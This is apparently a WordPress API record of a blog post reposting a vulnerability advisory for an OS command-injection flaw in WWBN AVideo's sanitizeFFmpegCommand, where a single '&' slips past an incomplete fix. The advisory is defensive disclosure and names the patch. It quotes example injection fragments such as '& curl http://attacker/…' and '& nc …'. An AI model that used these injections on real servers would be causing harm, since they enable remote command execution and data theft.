{"id":82110,"date":"2026-07-17T00:47:21","date_gmt":"2026-07-16T21:17:21","guid":{"rendered":"https:\/\/afaghhosting.net\/blog\/cve-2026-55173-avideo-incomplete-fix-for-cve-2026-33482-sanitizeffmpegcommand-still-allows-a-single-background-operator-giving-os-command-execution-at-the-same-execasync-sh-c-sink\/"},"modified":"2026-07-17T00:47:21","modified_gmt":"2026-07-16T21:17:21","slug":"cve-2026-55173-avideo-incomplete-fix-for-cve-2026-33482-sanitizeffmpegcommand-still-allows-a-single-background-operator-giving-os-command-execution-at-the-same-execasync-sh-c-sink","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/cve-2026-55173-avideo-incomplete-fix-for-cve-2026-33482-sanitizeffmpegcommand-still-allows-a-single-background-operator-giving-os-command-execution-at-the-same-execasync-sh-c-sink\/","title":{"rendered":"CVE-2026-55173 &#8211; AVideo incomplete fix for CVE-2026-33482: sanitizeFFmpegCommand still allows a single &#8216;&amp;&#8217; (background operator), giving OS command execution at the same execAsync sh -c sink"},"content":{"rendered":"<p>CVE ID :CVE-2026-55173<\/p>\n<p>  Published : July 16, 2026, 9:17 p.m. | 17\u00a0minutes ago<\/p>\n<p>  Description :WWBN AVideo is an open source video platform. Versions 29.0 and below remain vulnerable to OS command injection because the fix for CVE-2026-33482 was incomplete and still does not neutralize a single &amp; (\u00a0the shell background operator). CVE-2026-33482 reported that sanitizeFFmpegCommand() (plugin\/API\/standAlone\/functions.php) failed to strip $(&#8230;) command substitution, allowing OS command injection at the execAsync() sh -c sink. The fix (commit 25c8ab90) added $, (, ), {, }, n, r to the denylist character class and a str_replace(&#8216;&amp;&amp;&#8217;, &#8221;, &#8230;), but did not account for the single &amp;. ffmpeg.json.php builds the command from _decryptString(getInput(&#8216;codeToExecEncrypted&#8217;)). This is the same threat model the original advisory accepted (\u201can attacker who can craft a valid encrypted payload can achieve arbitrary command execution on the standalone encoder server\u201d) and the same CVSS basis (AV:N\/AC:H\/PR:N). Multiple &amp;-separated commands can be chained (e.g. download + execute). Redirect-based payloads are blocked by the &gt; strip, but command execution (e.g. &amp; curl http:\/\/attacker\/&#8230;, &amp; nc &#8230;, dropping\/running a file) is not. This issue has been patched by this commit: https:\/\/github.com\/WWBN\/AVideo\/commit\/c1cfa2bea8a351a1d07f5758f82887403e3abf1f.<\/p>\n<p>  Severity: 8.1 | HIGH<\/p>\n<p>  Visit the link for more details, such as CVSS details, affected products, timeline, and more&#8230;\u00a0<\/p>\n","protected":false},"excerpt":{"rendered":"<p>CVE ID :CVE-2026-55173 Published : July 16, 2026, 9:17 p.m. | 17\u00a0minutes ago Description :WWBN AVideo is an open source video platform. Versions 29.0 and below remain vulnerable to OS command injection because the fix for CVE-2026-33482 was incomplete and still does not neutralize a single &amp; (\u00a0the shell background operator). CVE-2026-33482 reported that sanitizeFFmpegCommand() &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-82110","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/82110","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=82110"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/82110\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=82110"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=82110"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=82110"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}